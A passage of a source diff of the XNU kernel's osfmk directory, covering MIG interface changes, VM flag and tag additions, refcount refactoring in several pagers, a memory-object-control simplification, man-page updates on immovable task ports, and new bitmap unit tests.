+ calling_pid : int32_t; + calling_gid : uint32_t; + target_pid : int32_t; + flavor : mach_task_flavor_t; + ServerAuditToken caller_cred : audit_token_t); + /* vim: set ft=c : */ diff --git a/osfmk/mach/task_special_ports.h b/osfmk/mach/task_special_ports.h index a2840ed89..fa561750f 100644 --- a/osfmk/mach/task_special_ports.h +++ b/osfmk/mach/task_special_ports.h @@ -81,7 +81,9 @@ typedef int task_special_port_t; #define TASK_READ_PORT 6 /* The read port for task. */ - +/* + * Evolving and likely to change. + */ #define TASK_SEATBELT_PORT 7 /* Seatbelt compiler/DEM port for task. */ diff --git a/osfmk/mach/thread_act.defs b/osfmk/mach/thread_act.defs index e7f20e54c..162f0f54b 100644 --- a/osfmk/mach/thread_act.defs +++ b/osfmk/mach/thread_act.defs @@ -164,14 +164,14 @@ thread_set_state( * for its task is also zero. */ routine thread_suspend( - target_act : thread_act_t); + target_act : thread_read_t); /* * Decrement the suspend count for the target thread, * if that count is not already zero. */ routine thread_resume( - target_act : thread_act_t); + target_act : thread_read_t); /* * Cause any user or meta- instructions currently being @@ -385,6 +385,17 @@ routine thread_convert_thread_state( out out_state : thread_state_t, CountInOut); #ifdef XNU_KERNEL_PRIVATE -#endif + skip; +#else + skip; +#endif /* XNU_KERNEL_PRIVATE */ + +routine thread_get_exception_ports_info( + port : mach_port_t; + exception_mask : exception_mask_t; + out masks : exception_mask_array_t; + out old_handlers_info : exception_handler_info_array_t, SameCount; + out old_behaviors : exception_behavior_array_t, SameCount; + out old_flavors : exception_flavor_array_t, SameCount); /* vim: set ft=c : */ diff --git a/osfmk/mach/thread_special_ports.h b/osfmk/mach/thread_special_ports.h index 7bb1bea5a..1a24db516 100644 --- a/osfmk/mach/thread_special_ports.h +++ b/osfmk/mach/thread_special_ports.h @@ -73,6 +73,7 @@ #define THREAD_READ_PORT 3 /* The read port for thread. */ +#define THREAD_MAX_SPECIAL_PORT THREAD_READ_PORT /* * Definitions for ease of use */ diff --git a/osfmk/mach/vm_map.defs b/osfmk/mach/vm_map.defs index 7caa92639..14f172e4b 100644 --- a/osfmk/mach/vm_map.defs +++ b/osfmk/mach/vm_map.defs @@ -506,5 +506,21 @@ routine PREFIX(vm_purgable_control) ( routine vm_map_exec_lockdown( target_task : vm_map_t); +routine PREFIX(KERNEL_SERVER_SUFFIX(vm_remap_new)) ( + target_task : vm_map_t; +inout target_address : vm_address_t; + size : vm_size_t; + mask : vm_address_t; + flags : int; +#ifdef KERNEL_SERVER + src_tport : mach_port_t; +#else + src_task : vm_map_read_t; +#endif + src_address : vm_address_t; + copy : boolean_t; +inout cur_protection : vm_prot_t; +inout max_protection : vm_prot_t; + inheritance : vm_inherit_t); /* vim: set ft=c : */ diff --git a/osfmk/mach/vm_param.h b/osfmk/mach/vm_param.h index 9a518a2bb..e87b5d1b7 100644 --- a/osfmk/mach/vm_param.h +++ b/osfmk/mach/vm_param.h @@ -242,7 +242,7 @@ extern uint64_t max_mem; /* 64-bit size of memory - limit * When we need to allocate a chunk of anonymous memory over that size, * we have to allocate more than one chunk. */ -#define ANON_MAX_SIZE 0xFFFFF000ULL +#define ANON_MAX_SIZE ((1ULL << 32) - PAGE_SIZE) /* * Work-around for * Break large anonymous memory areas into 128MB chunks to alleviate diff --git a/osfmk/mach/vm_statistics.h b/osfmk/mach/vm_statistics.h index 3de128669..f3038106e 100644 --- a/osfmk/mach/vm_statistics.h +++ b/osfmk/mach/vm_statistics.h @@ -309,6 +309,7 @@ typedef struct pmap_statistics *pmap_statistics_t; #define VM_FLAGS_NO_CACHE 0x0010 #define VM_FLAGS_RESILIENT_CODESIGN 0x0020 #define VM_FLAGS_RESILIENT_MEDIA 0x0040 +#define VM_FLAGS_PERMANENT 0x0080 #define VM_FLAGS_OVERWRITE 0x4000 /* delete any existing mappings first */ /* * VM_FLAGS_SUPERPAGE_MASK @@ -334,6 +335,7 @@ typedef struct pmap_statistics *pmap_statistics_t; VM_FLAGS_4GB_CHUNK | \ VM_FLAGS_RANDOM_ADDR | \ VM_FLAGS_NO_CACHE | \ + VM_FLAGS_PERMANENT | \ VM_FLAGS_OVERWRITE | \ VM_FLAGS_SUPERPAGE_MASK | \ VM_FLAGS_ALIAS_MASK) @@ -688,8 +690,9 @@ typedef struct { #define VM_KERN_MEMORY_SKYWALK 26 #define VM_KERN_MEMORY_LTABLE 27 #define VM_KERN_MEMORY_HV 28 +#define VM_KERN_MEMORY_RETIRED 29 -#define VM_KERN_MEMORY_FIRST_DYNAMIC 29 +#define VM_KERN_MEMORY_FIRST_DYNAMIC 30 /* out of tags: */ #define VM_KERN_MEMORY_ANY 255 #define VM_KERN_MEMORY_COUNT 256 diff --git a/osfmk/mach/vm_types.h b/osfmk/mach/vm_types.h index e29742be6..2b02e84a5 100644 --- a/osfmk/mach/vm_types.h +++ b/osfmk/mach/vm_types.h @@ -160,10 +160,8 @@ struct vm_allocation_total { }; struct vm_allocation_zone_total { - uint64_t total; - uint64_t peak; - uint32_t waste; - uint32_t wastediv; + vm_size_t vazt_total; + vm_size_t vazt_peak; }; typedef struct vm_allocation_zone_total vm_allocation_zone_total_t; diff --git a/osfmk/mach_debug/ipc_info.h b/osfmk/mach_debug/ipc_info.h index 520830894..c0e387b16 100644 --- a/osfmk/mach_debug/ipc_info.h +++ b/osfmk/mach_debug/ipc_info.h @@ -113,4 +113,11 @@ typedef struct ipc_info_tree_name { typedef ipc_info_tree_name_t *ipc_info_tree_name_array_t; +typedef struct ipc_info_port { + natural_t iip_port_object; /* port object identifier */ + natural_t iip_receiver_object; /* receiver task identifier (if any) */ +} ipc_info_port_t; + +typedef ipc_info_port_t *exception_handler_info_array_t; + #endif /* _MACH_DEBUG_IPC_INFO_H_ */ diff --git a/osfmk/machine/machine_routines.h b/osfmk/machine/machine_routines.h index 40eae37e9..7f2508772 100644 --- a/osfmk/machine/machine_routines.h +++ b/osfmk/machine/machine_routines.h @@ -51,13 +51,6 @@ __BEGIN_DECLS */ bool ml_cpu_can_exit(int cpu_id); -/*! - * @function ml_cpu_init_state - * @brief Needs to be called from schedulable context prior to using - * the ml_cpu_*_state_transition or ml_cpu_*_loop functions. - */ -void ml_cpu_init_state(void); - /*! * @function ml_cpu_begin_state_transition * @brief Tell the platform code that processor_start() or diff --git a/osfmk/man/task_get_special_port.html b/osfmk/man/task_get_special_port.html index 9ff80bc28..f6ccb2bea 100644 --- a/osfmk/man/task_get_special_port.html +++ b/osfmk/man/task_get_special_port.html @@ -46,8 +46,8 @@ values are:
TASK_KERNEL_PORT
[task-self send right] The port used to control this task. Used -to send messages that affect the task. This is the port returned -by mach_task_self. +to send messages that affect the task. This is the movable task port and +different from the one returned by mach_task_self (immovable).

TASK_BOOTSTRAP_PORT
diff --git a/osfmk/man/task_set_special_port.html b/osfmk/man/task_set_special_port.html index 55cc0d716..1cabc6171 100644 --- a/osfmk/man/task_set_special_port.html +++ b/osfmk/man/task_set_special_port.html @@ -51,10 +51,10 @@ messages requesting return of other system service ports.
TASK_KERNEL_PORT
[task-self send right] The task's kernel port. Used by the -kernel to receive messages to manipulate the task. This is the -port returned by mach_task_self. Setting this special port -does not change the identity of the kernel port that names the -task; this simply changes the value returned as the kernel +kernel to receive messages to manipulate the task. This is the movable task +port and different from the one returned by mach_task_self +(immovable). Setting this special port does not change the identity of the +kernel port that names the task; this simply changes the value returned as the kernel special port.

TASK_HOST_NAME_PORT diff --git a/osfmk/man/thread_get_special_port.html b/osfmk/man/thread_get_special_port.html index f8e0abba6..ee0639063 100644 --- a/osfmk/man/thread_get_special_port.html +++ b/osfmk/man/thread_get_special_port.html @@ -36,8 +36,8 @@ values are:
THREAD_KERNEL_PORT
[thread-self send right] The port used to name the thread. -Used to invoke operations that affect the thread. This is the -port returned by mach_thread_self. +Used to invoke operations that affect the thread. This is the movable +port for the thread and different from mach_thread_self (immovable).

special_port diff --git a/osfmk/man/thread_set_special_port.html b/osfmk/man/thread_set_special_port.html index 251d27536..9fa9605b8 100644 --- a/osfmk/man/thread_set_special_port.html +++ b/osfmk/man/thread_set_special_port.html @@ -33,8 +33,8 @@ The special port to be set. Valid values are:
THREAD_KERNEL_PORT
[thread-self port] The thread's kernel port. Used by the kernel -to receive messages from the thread. This is the port returned -by mach_thread_self. +to receive messages from the thread. This is the movable +port for the thread and different from mach_thread_self(immovable).

special_port diff --git a/osfmk/prng/entropy.c b/osfmk/prng/entropy.c index ea1ac1dfe..18a8134a3 100644 --- a/osfmk/prng/entropy.c +++ b/osfmk/prng/entropy.c @@ -37,7 +37,6 @@ #include #include #include -#include #include #include #include @@ -160,7 +159,6 @@ entropy_analysis_init(uint32_t sample_count) entropy_analysis_max_sample_count = sample_count; entropy_analysis_buffer_size = sample_count * sizeof(entropy_sample_t); entropy_analysis_buffer = zalloc_permanent(entropy_analysis_buffer_size, ZALIGN(entropy_sample_t)); - entropy_analysis_register_sysctls(); } __startup_func diff --git a/osfmk/tests/bitmap_test.c b/osfmk/tests/bitmap_test.c index 9d8d80b13..074e0a67f 100644 --- a/osfmk/tests/bitmap_test.c +++ b/osfmk/tests/bitmap_test.c @@ -32,6 +32,7 @@ #include #include #include +#include extern void dump_bitmap_next(bitmap_t *map, uint nbits); extern void dump_bitmap_lsb(bitmap_t *map, uint nbits); @@ -117,7 +118,57 @@ test_bitmap(void) assert(bitmap_first(map, nbits) == -1); assert(bitmap_lsb_first(map, nbits) == -1); + /* bitmap_not */ + bitmap_not(map, map, nbits); + assert(bitmap_is_full(map, nbits)); + + bitmap_not(map, map, nbits); + assert(bitmap_first(map, nbits) == -1); + assert(bitmap_lsb_first(map, nbits) == -1); + + /* bitmap_and */ + bitmap_t *map0 = bitmap_alloc(nbits); + assert(bitmap_first(map0, nbits) == -1); + + bitmap_t *map1 = bitmap_alloc(nbits); + bitmap_full(map1, nbits); + assert(bitmap_is_full(map1, nbits)); + + bitmap_and(map, map0, map1, nbits); + assert(bitmap_first(map, nbits) == -1); + + bitmap_and(map, map1, map1, nbits); + assert(bitmap_is_full(map, nbits)); + + /* bitmap_and_not */ + bitmap_and_not(map, map0, map1, nbits); + assert(bitmap_first(map, nbits) == -1); + + bitmap_and_not(map, map1, map0, nbits); + assert(bitmap_is_full(map, nbits)); + + /* bitmap_equal */ + for (uint i = 0; i < nbits; i++) { + bitmap_clear(map, i); + assert(!bitmap_equal(map, map1, nbits)); + bitmap_set(map, i); + assert(bitmap_equal(map, map1, nbits)); + } + + /* bitmap_and_not_mask_first */ + for (uint i = 0; i < nbits; i++) { + bitmap_clear(map, i); + expected_result = i; + int result = bitmap_and_not_mask_first(map1, map, nbits); + assert(result == expected_result); + bitmap_set(map, i); + result = bitmap_and_not_mask_first(map1, map, nbits); + assert(result == -1); + } + bitmap_free(map, nbits); + bitmap_free(map0, nbits); + bitmap_free(map1, nbits); } } diff --git a/osfmk/tests/kernel_tests.c b/osfmk/tests/kernel_tests.c index da46869c7..05e180390 100644 --- a/osfmk/tests/kernel_tests.c +++ b/osfmk/tests/kernel_tests.c @@ -85,6 +85,7 @@ extern kern_return_t console_serial_parallel_log_tests(void); extern kern_return_t test_os_log(void); extern kern_return_t test_os_log_parallel(void); extern kern_return_t bitmap_post_test(void); +extern kern_return_t counter_tests(void); #ifdef __arm64__ extern kern_return_t arm64_munger_test(void); @@ -138,7 +139,8 @@ struct xnupost_test kernel_post_tests[] = {XNUPOST_TEST_CONFIG_BASIC(zalloc_test #if __ARM_VFP__ XNUPOST_TEST_CONFIG_BASIC(vfp_state_test), #endif - XNUPOST_TEST_CONFIG_BASIC(vm_tests), }; + XNUPOST_TEST_CONFIG_BASIC(vm_tests), + XNUPOST_TEST_CONFIG_BASIC(counter_tests)}; uint32_t kernel_post_tests_count = sizeof(kernel_post_tests) / sizeof(xnupost_test_data_t); @@ -405,7 +407,7 @@ zalloc_test(void) ZC_DESTRUCTIBLE); T_ASSERT_NOTNULL(test_zone, NULL); - T_ASSERT_EQ_INT(test_zone->countfree, 0, NULL); + T_ASSERT_EQ_INT(test_zone->z_elems_free, 0, NULL); T_SETUPEND; T_ASSERT_NOTNULL(test_ptr = zalloc(test_zone), NULL); diff --git a/osfmk/tests/ptrauth_data_tests.c b/osfmk/tests/ptrauth_data_tests.c index a9c4c8bb5..23397bef4 100644 --- a/osfmk/tests/ptrauth_data_tests.c +++ b/osfmk/tests/ptrauth_data_tests.c @@ -85,7 +85,7 @@ ptrauth_data_tests(void) /* task_t */ ALLOC_VALIDATE_DATA_PTR(struct task, vm_map_t, map, "task.map"); - ALLOC_VALIDATE_DATA_PTR(struct task, struct ipc_port *, itk_self[0], "task.itk_self"); + ALLOC_VALIDATE_DATA_PTR(struct task, struct ipc_port *, itk_task_ports[0], "task.itk_task_ports"); ALLOC_VALIDATE_DATA_PTR(struct task, struct ipc_port *, itk_settable_self, "task.itk_settable_self"); ALLOC_VALIDATE_DATA_PTR(struct task, struct ipc_port *, itk_host, "task.itk_host"); ALLOC_VALIDATE_DATA_PTR(struct task, struct ipc_port *, itk_bootstrap, "task.itk_bootstrap"); diff --git a/osfmk/vm/Makefile b/osfmk/vm/Makefile index d9f9cc209..04aaf3450 100644 --- a/osfmk/vm/Makefile +++ b/osfmk/vm/Makefile @@ -11,6 +11,9 @@ DATAFILES = EXPORT_ONLY_FILES = \ memory_types.h \ pmap.h \ + lz4.h \ + lz4_constants.h \ + lz4_assembly_select.h \ vm_fault.h \ vm_kern.h \ vm_map.h \ diff --git a/osfmk/vm/bsd_vm.c b/osfmk/vm/bsd_vm.c index d85190a4a..871b22242 100644 --- a/osfmk/vm/bsd_vm.c +++ b/osfmk/vm/bsd_vm.c @@ -118,7 +118,11 @@ typedef struct vnode_pager { struct memory_object vn_pgr_hdr; /* pager-specific */ - struct os_refcnt ref_count; +#if MEMORY_OBJECT_HAS_REFCOUNT +#define vn_pgr_hdr_ref vn_pgr_hdr.mo_ref +#else + os_ref_atomic_t vn_pgr_hdr_ref; +#endif struct vnode *vnode_handle; /* vnode handle */ } *vnode_pager_t; @@ -650,7 +654,7 @@ vnode_pager_reference( vnode_pager_t vnode_object; vnode_object = vnode_pager_lookup(mem_obj); - os_ref_retain(&vnode_object->ref_count); + os_ref_retain_raw(&vnode_object->vn_pgr_hdr_ref, NULL); } /* @@ -666,7 +670,7 @@ vnode_pager_deallocate( vnode_object = vnode_pager_lookup(mem_obj); - if (os_ref_release(&vnode_object->ref_count) == 0) { + if (os_ref_release_raw(&vnode_object->vn_pgr_hdr_ref, NULL) == 0) { if (vnode_object->vnode_handle != NULL) { vnode_pager_vrele(vnode_object->vnode_handle); } @@ -920,7 +924,7 @@ vnode_object_create( vnode_object->vn_pgr_hdr.mo_pager_ops = &vnode_pager_ops; vnode_object->vn_pgr_hdr.mo_control = MEMORY_OBJECT_CONTROL_NULL; - os_ref_init(&vnode_object->ref_count, NULL); + os_ref_init_raw(&vnode_object->vn_pgr_hdr_ref, NULL); vnode_object->vnode_handle = vp; return vnode_object; diff --git a/osfmk/vm/device_vm.c b/osfmk/vm/device_vm.c index 76e537501..d5bbfecea 100644 --- a/osfmk/vm/device_vm.c +++ b/osfmk/vm/device_vm.c @@ -93,13 +93,23 @@ typedef struct device_pager { /* pager-specific data */ lck_mtx_t lock; - struct os_refcnt ref_count; /* reference count */ device_port_t device_handle; /* device_handle */ vm_size_t size; +#if MEMORY_OBJECT_HAS_REFCOUNT +#define dev_pgr_hdr_ref dev_pgr_hdr.mo_ref +#else + os_ref_atomic_t dev_pgr_hdr_ref; +#endif int flags; boolean_t is_mapped; } *device_pager_t; +__header_always_inline os_ref_count_t +device_pager_get_refcount(device_pager_t device_object) +{ + return os_ref_get_count_raw(&device_object->dev_pgr_hdr_ref); +} + LCK_GRP_DECLARE(device_pager_lck_grp, "device_pager"); ZONE_DECLARE(device_pager_zone, "device node pager structures", @@ -229,7 +239,7 @@ device_pager_lookup( assert(mem_obj->mo_pager_ops == &device_pager_ops); device_object = (device_pager_t)mem_obj; - assert(os_ref_get_count(&device_object->ref_count) > 0); + assert(device_pager_get_refcount(device_object) > 0); return device_object; } @@ -357,10 +367,10 @@ device_pager_reference( device_pager_t device_object; device_object = device_pager_lookup(mem_obj); - os_ref_retain(&device_object->ref_count); + os_ref_retain_raw(&device_object->dev_pgr_hdr_ref, NULL); DTRACE_VM2(device_pager_reference, device_pager_t, device_object, - unsigned int, os_ref_get_count(&device_object->ref_count)); + unsigned int, device_pager_get_refcount(device_object)); } /* @@ -372,14 +382,15 @@ device_pager_deallocate( { device_pager_t device_object; memory_object_control_t device_control; + os_ref_count_t ref_count; device_object = device_pager_lookup(mem_obj); DTRACE_VM2(device_pager_deallocate, device_pager_t, device_object, - unsigned int, os_ref_get_count(&device_object->ref_count)); + unsigned int, device_pager_get_refcount(device_object)); - os_ref_count_t ref_count = os_ref_release(&device_object->ref_count); + ref_count = os_ref_release_raw(&device_object->dev_pgr_hdr_ref, NULL); if (ref_count == 1) { /* @@ -389,7 +400,7 @@ device_pager_deallocate( DTRACE_VM2(device_pager_destroy, device_pager_t, device_object, - unsigned int, os_ref_get_count(&device_object->ref_count)); + unsigned int, device_pager_get_refcount(device_object)); assert(device_object->is_mapped == FALSE); if (device_object->device_handle != (device_port_t) NULL) { @@ -404,8 +415,14 @@ device_pager_deallocate( */ DTRACE_VM2(device_pager_free, device_pager_t, device_object, - unsigned int, os_ref_get_count(&device_object->ref_count)); + unsigned int, device_pager_get_refcount(device_object)); + device_control = device_object->dev_pgr_hdr.mo_control; + + if (device_control != MEMORY_OBJECT_CONTROL_NULL) { + memory_object_control_deallocate(device_control); + device_object->dev_pgr_hdr.mo_control = MEMORY_OBJECT_CONTROL_NULL; + } device_pager_lock_destroy(device_object); zfree(device_pager_zone, device_object); @@ -469,7 +486,7 @@ device_pager_map( device_object = device_pager_lookup(mem_obj); device_pager_lock(device_object); - assert(os_ref_get_count(&device_object->ref_count) > 0); + assert(device_pager_get_refcount(device_object) > 0); if (device_object->is_mapped == FALSE) { /* * First mapping of this pager: take an extra reference @@ -494,7 +511,7 @@ device_pager_last_unmap( device_object = device_pager_lookup(mem_obj); device_pager_lock(device_object); - assert(os_ref_get_count(&device_object->ref_count) > 0); + assert(device_pager_get_refcount(device_object) > 0); if (device_object->is_mapped) { device_object->is_mapped = FALSE; drop_ref = TRUE; @@ -532,12 +549,12 @@ device_object_create(void) device_object->dev_pgr_hdr.mo_control = MEMORY_OBJECT_CONTROL_NULL; device_pager_lock_init(device_object); - os_ref_init(&device_object->ref_count, NULL); + os_ref_init_raw(&device_object->dev_pgr_hdr_ref, NULL); device_object->is_mapped = FALSE; DTRACE_VM2(device_pager_create, device_pager_t, device_object, - unsigned int, os_ref_get_count(&device_object->ref_count)); + unsigned int, device_pager_get_refcount(device_object)); return device_object; } diff --git a/osfmk/vm/lz4.h b/osfmk/vm/lz4.h index 512efd04b..d2b80278c 100644 --- a/osfmk/vm/lz4.h +++ b/osfmk/vm/lz4.h @@ -34,7 +34,11 @@ #include "lz4_assembly_select.h" #include "lz4_constants.h" +#if CONFIG_IO_COMPRESSION_STATS +#include +#else #define memcpy __builtin_memcpy +#endif #pragma mark - Building blocks diff --git a/osfmk/vm/memory_object.c b/osfmk/vm/memory_object.c index 7fa63cc7a..a952e0d69 100644 --- a/osfmk/vm/memory_object.c +++ b/osfmk/vm/memory_object.c @@ -1462,16 +1462,7 @@ memory_object_iopl_request( vm_object_reference(object); named_entry_unlock(named_entry); } else if (ip_kotype(port) == IKOT_MEM_OBJ_CONTROL) { - memory_object_control_t control; - control = (memory_object_control_t) port; - if (control == NULL) { - return KERN_INVALID_ARGUMENT; - } - object = memory_object_control_to_vm_object(control); - if (object == VM_OBJECT_NULL) { - return KERN_INVALID_ARGUMENT; - } - vm_object_reference(object); + panic("unexpected IKOT_MEM_OBJ_CONTROL: %p", port); } else { return KERN_INVALID_ARGUMENT; } @@ -1638,8 +1629,6 @@ host_default_memory_manager( return KERN_INVALID_HOST; } - assert(host_priv == &realhost); - new_manager = *default_manager; lck_mtx_lock(&memory_manager_default_lock); current_manager = memory_manager_default; @@ -2006,43 +1995,26 @@ memory_object_is_shared_cache( return object->object_is_shared_cache; } -static ZONE_DECLARE(mem_obj_control_zone, "mem_obj_control", - sizeof(struct memory_object_control), ZC_NOENCRYPT); - __private_extern__ memory_object_control_t memory_object_control_allocate( vm_object_t object) { - memory_object_control_t control; - - control = (memory_object_control_t)zalloc(mem_obj_control_zone); - if (control != MEMORY_OBJECT_CONTROL_NULL) { - control->moc_object = object; - control->moc_ikot = IKOT_MEM_OBJ_CONTROL; /* fake ip_kotype */ - } - return control; + return object; } __private_extern__ void memory_object_control_collapse( - memory_object_control_t control, + memory_object_control_t *control, vm_object_t object) { - assert((control->moc_object != VM_OBJECT_NULL) && - (control->moc_object != object)); - control->moc_object = object; + *control = object; } __private_extern__ vm_object_t memory_object_control_to_vm_object( memory_object_control_t control) { - if (control == MEMORY_OBJECT_CONTROL_NULL || - control->moc_ikot != IKOT_MEM_OBJ_CONTROL) { - return VM_OBJECT_NULL; - } - - return control->moc_object; + return control; } __private_extern__ vm_object_t @@ -2090,17 +2062,16 @@ memory_object_control_reference( */ void memory_object_control_deallocate( - memory_object_control_t control) + __unused memory_object_control_t control) { - zfree(mem_obj_control_zone, control); } void memory_object_control_disable( - memory_object_control_t control) + memory_object_control_t *control) { - assert(control->moc_object != VM_OBJECT_NULL); - control->moc_object = VM_OBJECT_NULL; + assert(*control != VM_OBJECT_NULL); + *control = VM_OBJECT_NULL; } void diff --git a/osfmk/vm/memory_object.h b/osfmk/vm/memory_object.h index 930a66023..cb57eb469 100644 --- a/osfmk/vm/memory_object.h +++ b/osfmk/vm/memory_object.h @@ -80,7 +80,7 @@ memory_object_control_t memory_object_control_allocate( __private_extern__ void memory_object_control_collapse( - memory_object_control_t control, + memory_object_control_t *control, vm_object_t object); __private_extern__ @@ -95,7 +95,7 @@ mach_port_t convert_mo_control_to_port( memory_object_control_t control); extern void memory_object_control_disable( - memory_object_control_t control); + memory_object_control_t *control); extern memory_object_control_t convert_port_to_mo_control( diff --git a/osfmk/vm/pmap.h b/osfmk/vm/pmap.h index 63fee92d7..d396d8f51 100644 --- a/osfmk/vm/pmap.h +++ b/osfmk/vm/pmap.h @@ -138,6 +138,9 @@ extern void *pmap_steal_memory(vm_size_t size); /* Early memory allocation */ extern void *pmap_steal_freeable_memory(vm_size_t size); /* Early memory allocation */ extern uint_t pmap_free_pages(void); /* report remaining unused physical pages */ +#if defined(__arm__) || defined(__arm64__) +extern uint_t pmap_free_pages_span(void); /* report phys address range of unused physical pages */ +#endif /* defined(__arm__) || defined(__arm64__) */ extern void pmap_startup(vm_offset_t *startp, vm_offset_t *endp); /* allocate vm_page structs */ @@ -902,6 +905,9 @@ extern bool pmap_is_trust_cache_loaded(const uuid_t uuid); extern uint32_t pmap_lookup_in_static_trust_cache(const uint8_t cdhash[CS_CDHASH_LEN]); extern bool pmap_lookup_in_loaded_trust_caches(const uint8_t cdhash[CS_CDHASH_LEN]); +extern void pmap_set_compilation_service_cdhash(const uint8_t cdhash[CS_CDHASH_LEN]); +extern bool pmap_match_compilation_service_cdhash(const uint8_t cdhash[CS_CDHASH_LEN]); + extern bool pmap_in_ppl(void); extern void *pmap_claim_reserved_ppl_page(void); @@ -911,6 +917,8 @@ extern void pmap_ledger_alloc_init(size_t); extern ledger_t pmap_ledger_alloc(void); extern void pmap_ledger_free(ledger_t); +extern bool pmap_is_bad_ram(ppnum_t ppn); +extern void pmap_retire_page(ppnum_t ppn); extern kern_return_t pmap_cs_allow_invalid(pmap_t pmap); #if __arm64__ diff --git a/osfmk/vm/vm_apple_protect.c b/osfmk/vm/vm_apple_protect.c index 17b667c2c..f7fcaceb3 100644 --- a/osfmk/vm/vm_apple_protect.c +++ b/osfmk/vm/vm_apple_protect.c @@ -59,7 +59,6 @@ #include #include - /* * APPLE PROTECT MEMORY PAGER * @@ -150,13 +149,18 @@ const struct memory_object_pager_ops apple_protect_pager_ops = { */ typedef struct apple_protect_pager { /* mandatory generic header */ - struct memory_object ap_pgr_hdr; + struct memory_object ap_pgr_hdr; /* pager-specific data */ queue_chain_t pager_queue; /* next & prev pagers */ - struct os_refcnt ref_count; /* reference count */ - boolean_t is_ready; /* is this pager ready ? */ - boolean_t is_mapped; /* is this mem_obj mapped ? */ +#if MEMORY_OBJECT_HAS_REFCOUNT +#define ap_pgr_hdr_ref ap_pgr_hdr.mo_ref +#else + os_ref_atomic_t ap_pgr_hdr_ref; /* reference count */ +#endif + bool is_ready; /* is this pager ready ? */ + bool is_mapped; /* is this mem_obj mapped ? */ + bool is_cached; /* is this pager cached ? */ vm_object_t backing_object; /* VM obj w/ encrypted data */ vm_object_offset_t backing_offset; vm_object_offset_t crypto_backing_offset; /* for key... */ @@ -170,8 +174,8 @@ typedef struct apple_protect_pager { * List of memory objects managed by this EMM. * The list is protected by the "apple_protect_pager_lock" lock. */ -int apple_protect_pager_count = 0; /* number of pagers */ -int apple_protect_pager_count_mapped = 0; /* number of unmapped pagers */ +unsigned int apple_protect_pager_count = 0; /* number of pagers */ +unsigned int apple_protect_pager_count_mapped = 0; /* number of unmapped pagers */ queue_head_t apple_protect_pager_queue = QUEUE_HEAD_INITIALIZER(apple_protect_pager_queue); LCK_GRP_DECLARE(apple_protect_pager_lck_grp, "apple_protect"); LCK_MTX_DECLARE(apple_protect_pager_lock, &apple_protect_pager_lck_grp); @@ -179,15 +183,15 @@ LCK_MTX_DECLARE(apple_protect_pager_lock, &apple_protect_pager_lck_grp); /* * Maximum number of unmapped pagers we're willing to keep around. */ -int apple_protect_pager_cache_limit = 20; +unsigned int apple_protect_pager_cache_limit = 20; /* * Statistics & counters. */ -int apple_protect_pager_count_max = 0; -int apple_protect_pager_count_unmapped_max = 0; -int apple_protect_pager_num_trim_max = 0; -int apple_protect_pager_num_trim_total = 0; +unsigned int apple_protect_pager_count_max = 0; +unsigned int apple_protect_pager_count_unmapped_max = 0; +unsigned int apple_protect_pager_num_trim_max = 0; +unsigned int apple_protect_pager_num_trim_total = 0; @@ -198,7 +202,8 @@ apple_protect_pager_t apple_protect_pager_create( vm_object_offset_t crypto_backing_offset, struct pager_crypt_info *crypt_info, vm_object_offset_t crypto_start, - vm_object_offset_t crypto_end); + vm_object_offset_t crypto_end, + boolean_t cache_pager); apple_protect_pager_t apple_protect_pager_lookup(memory_object_t mem_obj); void apple_protect_pager_dequeue(apple_protect_pager_t pager); void apple_protect_pager_deallocate_internal(apple_protect_pager_t pager, @@ -375,7 +380,7 @@ apple_protect_pager_data_request( pager = apple_protect_pager_lookup(mem_obj); assert(pager->is_ready); - assert(os_ref_get_count(&pager->ref_count) > 1); /* pager is alive and mapped */ + assert(os_ref_get_count_raw(&pager->ap_pgr_hdr_ref) > 1); /* pager is alive and mapped */ PAGER_DEBUG(PAGER_PAGEIN, ("apple_protect_pager_data_request: %p, %llx, %x, %x, pager %p\n", mem_obj, offset, length, protection_required, pager)); @@ -402,7 +407,7 @@ apple_protect_pager_data_request( retval = kr; goto done; } - dst_object = mo_control->moc_object; + dst_object = memory_object_control_to_vm_object(mo_control); assert(dst_object != VM_OBJECT_NULL); /* @@ -743,7 +748,7 @@ apple_protect_pager_reference( pager = apple_protect_pager_lookup(mem_obj); lck_mtx_lock(&apple_protect_pager_lock); - os_ref_retain_locked(&pager->ref_count); + os_ref_retain_locked_raw(&pager->ap_pgr_hdr_ref, NULL); lck_mtx_unlock(&apple_protect_pager_lock); } @@ -824,7 +829,8 @@ apple_protect_pager_deallocate_internal( boolean_t locked) { boolean_t needs_trimming; - int count_unmapped; + unsigned int count_unmapped; + os_ref_count_t ref_count; if (!locked) { lck_mtx_lock(&apple_protect_pager_lock); @@ -840,7 +846,7 @@ apple_protect_pager_deallocate_internal( } /* drop a reference on this pager */ - os_ref_count_t ref_count = os_ref_release_locked(&pager->ref_count); + ref_count = os_ref_release_locked_raw(&pager->ap_pgr_hdr_ref, NULL); if (ref_count == 1) { /* @@ -943,7 +949,7 @@ apple_protect_pager_map( lck_mtx_lock(&apple_protect_pager_lock); assert(pager->is_ready); - assert(os_ref_get_count(&pager->ref_count) > 0); /* pager is alive */ + assert(os_ref_get_count_raw(&pager->ap_pgr_hdr_ref) > 0); /* pager is alive */ if (pager->is_mapped == FALSE) { /* * First mapping of this pager: take an extra reference @@ -951,7 +957,7 @@ apple_protect_pager_map( * are removed. */ pager->is_mapped = TRUE; - os_ref_retain_locked(&pager->ref_count); + os_ref_retain_locked_raw(&pager->ap_pgr_hdr_ref, NULL); apple_protect_pager_count_mapped++; } lck_mtx_unlock(&apple_protect_pager_lock); @@ -969,7 +975,7 @@ apple_protect_pager_last_unmap( memory_object_t mem_obj) { apple_protect_pager_t pager; - int count_unmapped; + unsigned int count_unmapped; PAGER_DEBUG(PAGER_ALL, ("apple_protect_pager_last_unmap: %p\n", mem_obj)); @@ -1029,7 +1035,7 @@ apple_protect_pager_lookup( assert(mem_obj->mo_pager_ops == &apple_protect_pager_ops); pager = (apple_protect_pager_t)(uintptr_t) mem_obj; - assert(os_ref_get_count(&pager->ref_count) > 0); + assert(os_ref_get_count_raw(&pager->ap_pgr_hdr_ref) > 0); return pager; } @@ -1040,7 +1046,8 @@ apple_protect_pager_create( vm_object_offset_t crypto_backing_offset, struct pager_crypt_info *crypt_info, vm_object_offset_t crypto_start, - vm_object_offset_t crypto_end) + vm_object_offset_t crypto_end, + boolean_t cache_pager) { apple_protect_pager_t pager, pager2; memory_object_control_t control; @@ -1064,8 +1071,16 @@ apple_protect_pager_create( pager->ap_pgr_hdr.mo_control = MEMORY_OBJECT_CONTROL_NULL; pager->is_ready = FALSE;/* not ready until it has a "name" */ - os_ref_init_count(&pager->ref_count, 